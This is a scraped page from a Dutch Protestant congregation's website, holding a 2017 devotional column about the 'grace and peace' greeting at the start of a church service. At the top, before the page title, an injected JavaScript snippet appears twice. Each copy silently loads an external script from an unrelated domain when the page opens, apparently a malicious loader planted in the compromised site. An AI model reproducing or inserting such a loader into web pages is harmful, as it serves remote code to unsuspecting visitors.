;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Groet - PKN Damwâld

Groet

Gepubliceerd op: woensdag 26 juli 2017

Elke kerkdienst begint met Votum en Groet.
In een door ons bezochte kerkdienst gaf de predikante een nadere uitleg van de groet.
God groet ons en daarbij zegt Hij niet zoiets als: ‘Hallo’,’Goeiemorgen, fijn dat jullie er zijn’ of een of andere variant van een populaire wijze van groeten, nee, Hij groet ons met de woorden:
‘Genade en Vrede voor U van God …………….enz. ‘
De inhoud van Gods groet is veel omvattender en dieper dan onze, vaak oppervlakkige groet.
God groet ons met Genade en Vrede.
Genade, de betekenis van dit woord is volgens Wikipedia: ‘Een spontane, niet verdiende Goddelijke gunst’. In het gewone leven is genade te vergelijken met gratie, een bereidwillige tegemoetkoming van een vorst ten opzichte van iemand die deze vorm van vergeving eigenlijk niet heeft verdiend.
Veel Christenen ervaren in het woord Genade nog steeds de niet verdiende Goddelijke tegemoetkoming. Elke zondag wil God ons zo tegemoet komen, Hij denkt niet aan onze zonden maar nodigt ons uit bij Hem te komen en Zijn genade te aanvaarden.
Hij groet ons ook met ‘Vrede’. En dit geval is vrede veel meer dan niet-oorlog voeren.
Het is het in goede verhouding leven met God en met de naaste. En wie zou dat nu niet willen, vrede voor zichzelf en voor de naaste en Vrede met God.
Van Gods kant is er geen belemmering, Hij treedt ons tegemoet met ‘Vrede voor U’.
Wanneer U zondag weer in de kerk zit is het wellicht een optie om eens goed op U te laten inwerken op welke wijze en met welke woorden God ons tegemoet treedt.
Nee, eigenlijk moet ik niet zeggen ‘ons’ maar mij / U / jou. God spreekt ons persoonlijk aan, Zijn genade en Zijn vrede is voor ieder van ons persoonlijk.
‘Genade en Vrede voor jou, voor U, voor mij’!

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns